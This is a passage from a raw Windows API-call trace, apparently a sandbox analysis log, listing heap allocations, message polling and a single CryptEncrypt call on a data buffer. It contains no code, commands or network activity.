hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0258.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0258.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0258.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0258.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0258.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0258.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0258.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0258.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0258.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0258.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0258.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0258.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0258.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0258.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0258.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0258.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0258.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0258.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0258.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0258.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0258.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0258.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0258.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0258.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0258.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0258.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0258.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0258.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0258.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3279) returned 0x2f1a520 [0258.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0258.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0258.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3279) returned 0x2f1d7a8 [0258.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0258.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0258.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0258.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0258.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0258.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0258.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1a520 | out: hHeap=0x970000) returned 1 [0258.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0258.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0258.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0258.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1d7a8 | out: hHeap=0x970000) returned 1 [0258.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0258.498] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0258.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0258.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0258.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0258.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0258.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0258.498] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0258.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0258.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0258.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514a8 [0258.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0258.499] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0258.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0258.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0258.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0258.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0258.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0258.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0258.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0258.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0258.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0258.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0258.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0258.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0258.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0258.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0258.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0258.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0258.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0258.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0258.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0258.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0258.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0258.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0258.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0258.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0258.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0258.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0258.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0258.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0258.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0258.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0258.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0258.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0258.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0258.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0258.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0258.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0258.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0258.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0258.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0258.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0258.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0258.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0258.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0258.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0258.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0258.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0258.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0258.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0258.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0258.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0258.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0258.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0258.501] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0258.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51640, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0258.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0258.502] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0258.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0258.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0258.502] CryptEncrypt (in: hKey=0xa87350, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f17298*, pdwDataLen=0x8cef60*=0x3279, dwBufLen=0x3280 | out: pbData=0x2f17298*, pdwDataLen=0x8cef60*=0x3280) returned 1 [0258.503] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.503] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0258.503] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.503] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.503] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.503] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.503] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.503] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0258.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0258.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0258.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51508 [0258.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0258.503] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0258.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c38 [0258.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0258.504] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0258.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c38 | out: hHeap=0x970000) returned 1 [0258.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0258.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512c8 [0258.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0258.504] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0258.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0258.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0258.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0258.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0258.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0258.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0258.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0258.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0258.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0258.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512e0 [0258.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0258.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51520 [0258.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51580 [0258.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0258.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0258.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0258.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51310 [0258.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0258.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0258.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0258.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0258.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0258.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0258.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0258.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0258.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0258.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0258.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0258.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0258.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0258.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0258.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0258.505] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0258.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0258.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0258.505] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0258.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0258.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ce0 [0258.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0258.505] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0258.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ce0 | out: hHeap=0x970000) returned 1 [0258.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0258.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51598 [0258.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0258.506] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0258.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0258.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0258.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0258.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0258.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0258.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0258.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0258.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0258.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0258.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0258.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0258.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0258.507] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0258.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0258.507] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0258.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0258.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0258.507] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0258.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0258.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0258.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0258.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0258.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0258.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0258.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0258.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0258.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0258.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0258.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0258.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3280) returned 0x2f1a520 [0258.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0258.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0258.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3280) returned 0x2f20a30 [0258.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0258.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0258.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1a520 | out: hHeap=0x970000) returned 1 [0258.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0258.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0258.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0258.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0258.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0258.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3280) returned 0x2f1a520 [0258.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f20a30 | out: hHeap=0x970000) returned 1 [0258.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0258.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0258.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3280) returned 0x2f20a30 [0258.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1a520 | out: hHeap=0x970000) returned 1 [0258.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 